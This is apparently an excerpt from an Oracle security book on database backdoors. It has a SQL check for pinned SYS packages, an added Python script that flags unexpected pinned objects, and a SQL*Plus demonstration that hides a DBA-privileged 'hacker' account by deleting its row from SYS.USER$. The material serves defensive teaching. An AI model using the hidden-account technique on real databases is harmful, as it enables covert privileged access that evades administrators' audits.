SQL> SELECT SUBSTR(owner,1,10) Owner,
2 SUBSTR(type,1,12) Type,
3 SUBSTR(name,1,20) Name,
4 executions,
5 sharable_mem Mem_used,
6 SUBSTR(kept||' ',1,4) "Kept?"
7 FROM v$db_object_cache
8 WHERE type in ('TRIGGER','PROCEDURE','PACKAGE BODY','PACKAGE')
9 and owner in ('SYS','SYSTEM')
10 and executions != 0
11 and kept='YES'
12 ORDER BY name;
no rows selected
This is a really easy security check to make. Modern systems normally have enough memory that packages do not
need to be pinned, which is why none of the packages are pinned by default in 12.1. It is worth adding a check for pinned
packages as part of your state checking. As you can see, this backdoor was not difficult to defend against, so now on to the next
backdoor threat.
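One way to fold the pinned-package query into a scheduled state check, shown as an added example that is not code from the book: it parses spooled SQL*Plus output of the query above and reports any kept object missing from an approved baseline. The sample output, the object names in it, and the BASELINE set are constructed assumptions.

```python
import re

# Constructed sample: spooled SQL*Plus output of the query above (not from the page).
_FMT = "{:<10} {:<12} {:<20} {:>10} {:>10} {:<4}"
SAMPLE_SPOOL = "\n".join([
    _FMT.format("OWNER", "TYPE", "NAME", "EXECUTIONS", "MEM_USED", "Kept"),
    _FMT.format("-" * 10, "-" * 12, "-" * 20, "-" * 10, "-" * 10, "-" * 4),
    _FMT.format("SYS", "PACKAGE BODY", "DBMS_EXAMPLE_PKG", 42, 24576, "YES"),
    _FMT.format("SYS", "PACKAGE", "STANDARD", 1873, 442688, "YES"),
    "",
    "2 rows selected.",
])

# Hypothetical baseline: (owner, type, name) of objects the DBA pinned on purpose.
BASELINE = {("SYS", "PACKAGE", "STANDARD")}


def parse_spool(text):
    """Parse SQL*Plus tabular output into a list of dicts.

    Columns are sliced using the dashed rule under the headings, so a value
    containing a space ('PACKAGE BODY') stays in one field.
    """
    lines = text.splitlines()
    if any(line.strip() == "no rows selected" for line in lines):
        return []  # the clean result shown on the page
    rule = next((i for i, line in enumerate(lines)
                 if i > 0 and re.fullmatch(r"-+( +-+)+", line.rstrip())), None)
    if rule is None:
        # Login failure, ORA- error, empty file: never treat that as "clean".
        raise ValueError("unrecognised spool output")
    spans = [m.span() for m in re.finditer(r"-+", lines[rule])]
    cols = [lines[rule - 1][s:e].strip().upper() for s, e in spans]
    rows = []
    for line in lines[rule + 1:]:
        if not line.strip():
            break  # blank line ends the result set
        rows.append({c: line[s:e].strip() for c, (s, e) in zip(cols, spans)})
    return rows


def unexpected_pins(rows, baseline):
    """Return kept objects that are absent from the approved baseline."""
    found = {(r["OWNER"], r["TYPE"], r["NAME"]) for r in rows}
    return sorted(found - set(baseline))


if __name__ == "__main__":
    for owner, obj_type, name in unexpected_pins(parse_spool(SAMPLE_SPOOL), BASELINE):
        print(f"ALERT unexpected pinned object: {owner}.{name} ({obj_type})")
```

Output that is neither a result table nor "no rows selected" raises an error, so a failed login or ORA- message in the spool file is not mistaken for a clean state.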
Deleted User Still in the SGA
The following code shows how to create a user account that is not shown in DBA_USERS:
SQL> sho user
USER is "SYS"
SQL> create user hacker identified by o;
User created.
SQL> grant dba to hacker;
Grant succeeded.
SQL> select * from dba_users where username='HACKER';
USERNAME
--------------------------------------------------------------------------------
USER_ID
----------
PASSWORD..
C:\Users\abfb378\Desktop\Apress\Chapters>sqlplus hacker/o@192.168.56.101/orcl
SQL> DELETE FROM SYS.USER$ WHERE NAME='HACKER';
1 row deleted.
SQL> SELECT * FROM DBA_USERS WHERE username='HACKER';
no rows selected
 